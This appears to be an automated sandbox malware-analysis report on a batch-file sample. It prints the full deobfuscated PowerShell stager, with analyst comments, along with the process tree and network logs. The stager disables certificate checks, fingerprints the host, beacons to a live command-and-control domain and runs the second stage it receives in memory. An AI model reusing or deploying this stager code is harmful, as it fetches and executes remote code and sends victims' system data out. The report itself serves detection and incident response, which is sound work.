
Resubmissions

22/04/2024, 22:02 UTC

240422-1xtwbagh68 10

22/04/2024, 19:25 UTC

240422-x42b7afa68 10

19/04/2024, 03:02 UTC

240419-djmthsfh8w 10

Analysis

  • max time kernel
    1395s
  • max time network
    1179s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240412-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    22/04/2024, 19:25 UTC

General

  • Target

    267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat

  • Size

    6KB

  • MD5

    c3a090912dd6f7c536225858fb24387c

  • SHA1

    3773938587b06c7dc300b3d973c715c685a28877

  • SHA256

    267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7

  • SHA512

    7ff0e8434fafbc88e3e444a0300504c01e3976c369662ec55c70e38c1178f8e383522362efc2c4bde8c338bbb6c14007617a8696a6cb2082036c00136db6f0f8

  • SSDEEP

    192:UPtKEKMJRLI0WCUaypBO2xzk4oquKEwY6edkEEhd:UPtKdMJpJV2xo4oCEwAAhd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
# ---------------------------------------------------------------------------
# Analyst annotation. The sample below is left byte-for-byte as the sandbox
# extracted it; these comments only describe what the visible code does.
#
# What this is: a PowerShell HTTPS beacon/stager wrapped in invoke-expression
# (the `\n` sequences are escaped newlines inside a single string). The
# function names (CAM/ENC/DEC/Get-Webclient/primer*), the "SessionID=" cookie
# beacon and the base64 AES key layout match the structure of the open-source
# PoshC2 PowerShell implant -- attribution inferred from structure only; confirm.
#
# Execution chain (Processes section): cmd.exe runs the .bat, which starts
#   powershell -exec bypass -Noninteractive -windowstyle hidden -e <base64>
#
# Behaviour, in order:
#  * ServerCertificateValidationCallback = {$true}: TLS certificate checks are
#    disabled process-wide, so any certificate presented by the C2 is accepted.
#  * C2: $urls = @("https://po.vigorlabs.info:443"), beacon path
#    $curl = "/load/pages/index.php/". $df (per-URL Host-header / domain-front
#    value) is empty, so neither Host-header branch in Get-Webclient fires.
#  * CAM: AES via RijndaelManaged (fallback AesCryptoServiceProvider), CBC,
#    PaddingMode Zeros, 128-bit block, 256-bit key; key and IV are accepted
#    either as base64 strings or as raw byte arrays.
#  * ENC: IV is prepended to the ciphertext and the result base64-encoded. No
#    IV is passed in, so the IV is whatever the provider generated.
#  * DEC: first 16 bytes are the IV, the rest is ciphertext; the plaintext is
#    NUL-trimmed and then base64-decoded again (server payload is double-encoded).
#  * Get-Webclient: "kill date" 2999-12-01 -- exits only if today is later, so
#    effectively never. Sets UA "Mozilla/5.0 ... Firefox/123.0", an empty
#    Referer, default (current-user) credentials on the system proxy ($proxyurl
#    is empty, so the else branch runs), and the beacon as cookie
#    "SessionID=<base64>".
#  * primern: builds "$env:userdomain;$u;$env:computername;
#    $env:PROCESSOR_ARCHITECTURE;$pid;$procname;1" (user name gets a trailing
#    "*" when the token is in the Administrators role), encrypts it with the
#    hard-coded key rKru6ujEpc5b9ZsFrLrgy7+JwL/S6wzDQ2tzdSccxVg=, sends it as
#    the cookie in a GET to $url+$uri, decrypts the response with the SAME key
#    and, if the decrypted text contains "key", pipes it to iex -- the second
#    stage runs in memory; this stage itself writes nothing to disk (the only
#    file under Downloads is a __PSScriptPolicyTest_*.ps1, which looks like
#    PowerShell's own policy probe rather than a drop -- verify).
#  * primers + retry loop: if($true) always takes the loop branch: up to 30
#    attempts with exponential back-off (Start-Sleep 60, 120, 240, ... s).
#    Per-attempt errors are caught and written to output, never fatal. The
#    IsNullOrEmpty("") guard at the top of primers is always false -- a no-op.
#
# Detection / response notes:
#  * Network: GET https://po.vigorlabs.info:443/load/pages/index.php/ with a
#    Cookie header "SessionID=<base64>" and a Firefox/123.0 UA, from
#    powershell.exe. The Network section shows five ~260 B requests to
#    45.128.153.41:443 with 120-200 B replies, consistent with beacons that
#    received no tasking during the run (inferred from sizes only).
#  * The AES key is static and used in both directions, so the SessionID
#    cookie (host fingerprint) and any server reply seen in a capture can be
#    decrypted offline with the DEC/ENC routines above.
#  * Hunting pivots: "-exec bypass -windowstyle hidden -e" spawned by cmd.exe
#    running a .bat; the literal "SessionID="; the URI path above;
#    "ServerCertificateValidationCallback = {$true}" in script-block logs.
#  * The line break inside the User-Agent string below ("Gecko/20100101 " /
#    "Firefox/123.0") is most likely page wrapping of a single-line script --
#    check against the raw sample before using the UA as an exact-match IOC.
# ---------------------------------------------------------------------------
invoke-expression "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n$df=@(\"\")\n$h=\"\"\n$sc=\"\"\n$urls=@(\"https://po.vigorlabs.info:443\")\n$curl=\"/load/pages/index.php/\"\n$s=$urls[0]\nfunction CAM ($key,$IV){\ntry {$a = New-Object \"System.Security.Cryptography.RijndaelManaged\"\n} catch {$a = New-Object \"System.Security.Cryptography.AesCryptoServiceProvider\"}\n$a.Mode = [System.Security.Cryptography.CipherMode]::CBC\n$a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros\n$a.BlockSize = 128\n$a.KeySize = 256\nif ($IV)\n{\nif ($IV.getType().Name -eq \"String\")\n{$a.IV = [System.Convert]::FromBase64String($IV)}\nelse\n{$a.IV = $IV}\n}\nif ($key)\n{\nif ($key.getType().Name -eq \"String\")\n{$a.Key = [System.Convert]::FromBase64String($key)}\nelse\n{$a.Key = $key}\n}\n$a}\nfunction ENC ($key,$un){\n$b = [System.Text.Encoding]::UTF8.GetBytes($un)\n$a = CAM $key\n$e = $a.CreateEncryptor()\n$f = $e.TransformFinalBlock($b, 0, $b.Length)\n[byte[]] $p = $a.IV + $f\n[System.Convert]::ToBase64String($p)\n}\nfunction DEC ($key,$enc){\n$b = [System.Convert]::FromBase64String($enc)\n$IV = $b[0..15]\n$a = CAM $key $IV\n$d = $a.CreateDecryptor()\n$u = $d.TransformFinalBlock($b, 16, $b.Length - 16)\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]0)))}\nfunction Get-Webclient ($Cookie) {\n$d = (Get-Date -Format \"yyyy-MM-dd\");\n$d = [datetime]::ParseExact($d,\"yyyy-MM-dd\",$null);\n$k = [datetime]::ParseExact(\"2999-12-01\",\"yyyy-MM-dd\",$null);\nif ($k -lt $d) {exit}\n$username = \"\"\n$password = \"\"\n$proxyurl = \"\"\n$wc = New-Object System.Net.WebClient;\n\nif ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add(\"Host\",$h)}\nelseif($h){$script:s=\"https://$($h)/load/pages/index.php/\";$script:sc=\"https://$($h)\"}\n$wc.Headers.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 
Firefox/123.0\")\n$wc.Headers.Add(\"Referer\",\"\")\nif ($proxyurl) {\n$wp = New-Object System.Net.WebProxy($proxyurl,$true);\nif ($username -and $password) {\n$PSS = ConvertTo-SecureString $password -AsPlainText -Force;\n$getcreds = new-object system.management.automation.PSCredential $username,$PSS;\n$wp.Credentials = $getcreds;\n} else { $wc.UseDefaultCredentials = $true; }\n$wc.Proxy = $wp; } else {\n$wc.UseDefaultCredentials = $true;\n$wc.Proxy.Credentials = $wc.Credentials;\n} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, \"SessionID=$Cookie\") }\n$wc}\nfunction primern($url,$uri,$df) {\n$script:s=$url+$uri\n$script:sc=$url\n$script:h=$df\n$cu = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n$wp = New-Object System.Security.Principal.WindowsPrincipal($cu)\n$ag = [System.Security.Principal.WindowsBuiltInRole]::Administrator\n$procname = (Get-Process -id $pid).ProcessName\nif ($wp.IsInRole($ag)){$el=\"*\"}else{$el=\"\"}\ntry{$u=($cu).name+$el} catch{if ($env:username -eq \"$($env:computername)$\"){}else{$u=$env:username}}\n$o=\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;1\"\ntry {$pp=enc -key rKru6ujEpc5b9ZsFrLrgy7+JwL/S6wzDQ2tzdSccxVg= -un $o} catch {$pp=\"ERROR\"}\n$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)\n$p = dec -key rKru6ujEpc5b9ZsFrLrgy7+JwL/S6wzDQ2tzdSccxVg= -enc $primern\nif ($p -like \"*key*\") {$p| iex}\n}\nfunction primers {\nif(![string]::IsNullOrEmpty(\"\") -and ![Environment]::UserDomainName.Contains(\"\"))\n{\n return;\n}\nforeach($url in $urls){\n$index = [array]::IndexOf($urls, $url)\ntry {primern $url $curl $df[$index]} catch {write-output $error[0]}}}\n$limit=30\nif($true){\n $wait = 60\n while($true -and $limit -gt 0){\n $limit = $limit -1;\n primers\n Start-Sleep $wait\n $wait = $wait * 2;\n }\n}\nelse\n{\n primers\n}\n"
# powershell snippet 1
[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true}
$df = ""
$h = ""
$sc = ""
$urls = "https://po.vigorlabs.info:443"
$curl = "/load/pages/index.php/"
$s = "https://po.vigorlabs.info:443"
function cam($key, $iv) {
try {
$a = new-object "System.Security.Cryptography.RijndaelManaged"
} catch {
$a = new-object "System.Security.Cryptography.AesCryptoServiceProvider"
}
$a.mode = [system.security.cryptography.ciphermode]::cbc
$a.padding = [system.security.cryptography.paddingmode]::zeros
URLs
exe.dropper

https://po.vigorlabs.info:443

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -Noninteractive -windowstyle hidden -e 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
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4972

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    ocsp.digicert.com
    Remote address:
    8.8.8.8:53
    Request
    ocsp.digicert.com
    IN A
    Response
    ocsp.digicert.com
    IN CNAME
    ocsp.edge.digicert.com
    ocsp.edge.digicert.com
    IN CNAME
    fp2e7a.wpc.2be4.phicdn.net
    fp2e7a.wpc.2be4.phicdn.net
    IN CNAME
    fp2e7a.wpc.phicdn.net
    fp2e7a.wpc.phicdn.net
    IN A
    192.229.221.95
  • flag-us
    DNS
    arc.msn.com
    Remote address:
    8.8.8.8:53
    Request
    arc.msn.com
    IN A
    Response
    arc.msn.com
    IN CNAME
    arc.trafficmanager.net
    arc.trafficmanager.net
    IN CNAME
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    IN A
    20.223.35.26
  • flag-us
    DNS
    26.35.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.35.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    195.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    195.61.62.23.in-addr.arpa
    IN PTR
    Response
    195.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-195deploystaticakamaitechnologiescom
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    DNS
    ctldl.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    ctldl.windowsupdate.com
    IN A
    Response
    ctldl.windowsupdate.com
    IN CNAME
    wu-bg-shim.trafficmanager.net
    wu-bg-shim.trafficmanager.net
    IN CNAME
    download.windowsupdate.com.edgesuite.net
    download.windowsupdate.com.edgesuite.net
    IN CNAME
    a767.dspw65.akamai.net
    a767.dspw65.akamai.net
    IN A
    2.17.197.240
    a767.dspw65.akamai.net
    IN A
    2.17.197.249
  • flag-us
    DNS
    arc.msn.com
    Remote address:
    8.8.8.8:53
    Request
    arc.msn.com
    IN A
    Response
    arc.msn.com
    IN CNAME
    arc.trafficmanager.net
    arc.trafficmanager.net
    IN CNAME
    iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com
    iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com
    IN A
    20.223.36.55
  • flag-us
    DNS
    54.120.234.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    54.120.234.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.243.30
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    po.vigorlabs.info
    Remote address:
    8.8.8.8:53
    Request
    po.vigorlabs.info
    IN A
    Response
    po.vigorlabs.info
    IN A
    45.128.153.41
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.bing.com
    Remote address:
    8.8.8.8:53
    Request
    www.bing.com
    IN A
    Response
    www.bing.com
    IN CNAME
    wwwprod.www-bing-com.akadns.net
    wwwprod.www-bing-com.akadns.net
    IN CNAME
    www.bing.com.edgekey.net
    www.bing.com.edgekey.net
    IN CNAME
    e86303.dscx.akamaiedge.net
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.195
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.176
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.162
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.185
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.169
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.193
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.57
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.59
    e86303.dscx.akamaiedge.net
    IN A
    23.62.61.72
  • flag-us
    DNS
    arc.msn.com
    Remote address:
    8.8.8.8:53
    Request
    arc.msn.com
    IN A
    Response
    arc.msn.com
    IN CNAME
    arc.trafficmanager.net
    arc.trafficmanager.net
    IN CNAME
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
    IN A
    20.223.35.26
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • flag-us
    DNS
    240.197.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.197.17.2.in-addr.arpa
    IN PTR
    Response
    240.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-240deploystaticakamaitechnologiescom
  • flag-us
    DNS
    ris.api.iris.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    ris.api.iris.microsoft.com
    IN A
    Response
    ris.api.iris.microsoft.com
    IN CNAME
    ris-prod.trafficmanager.net
    ris-prod.trafficmanager.net
    IN CNAME
    asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com
    asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com
    IN A
    20.234.120.54
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    self.events.data.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    self.events.data.microsoft.com
    IN A
    Response
    self.events.data.microsoft.com
    IN CNAME
    self-events-data.trafficmanager.net
    self-events-data.trafficmanager.net
    IN CNAME
    onedscolprdaue00.australiaeast.cloudapp.azure.com
    onedscolprdaue00.australiaeast.cloudapp.azure.com
    IN A
    40.79.173.40
  • flag-us
    DNS
    40.173.79.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    40.173.79.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: C66473C2260D4234A4B9B7C7050B19EA Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
    date: Mon, 22 Apr 2024 19:37:22 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4DCC2A64DD434CC3A7DD7AE01B43BCFB Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
    date: Mon, 22 Apr 2024 19:37:22 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 792794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 19889026591D42218C7D8C69213094CE Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
    date: Mon, 22 Apr 2024 19:37:22 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 621794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E29206191939406B9C5FAD126B306ACD Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
    date: Mon, 22 Apr 2024 19:37:22 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 627437
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 6601653DDA3C43D4BD91D8E993EA79E8 Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
    date: Mon, 22 Apr 2024 19:37:23 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 659775
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 8CDBAE6DC17E41C1A7361D6B90B85F6E Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
    date: Mon, 22 Apr 2024 19:37:23 GMT
  • 45.128.153.41:443
    po.vigorlabs.info
    powershell.exe
    260 B
    160 B
    5
    4
  • 23.62.61.195:443
    www.bing.com
    tls
    2.1kB
    11.6kB
    23
    16
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    134.4kB
    3.7MB
    2672
    2666

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.0kB
    14
    11
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.6kB
    8.0kB
    16
    11
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
    8.1kB
    16
    14
  • 45.128.153.41:443
    po.vigorlabs.info
    powershell.exe
    260 B
    200 B
    5
    5
  • 45.128.153.41:443
    po.vigorlabs.info
    powershell.exe
    260 B
    160 B
    5
    4
  • 45.128.153.41:443
    po.vigorlabs.info
    powershell.exe
    260 B
    120 B
    5
    3
  • 45.128.153.41:443
    po.vigorlabs.info
    powershell.exe
    260 B
    120 B
    5
    3
  • 8.8.8.8:53
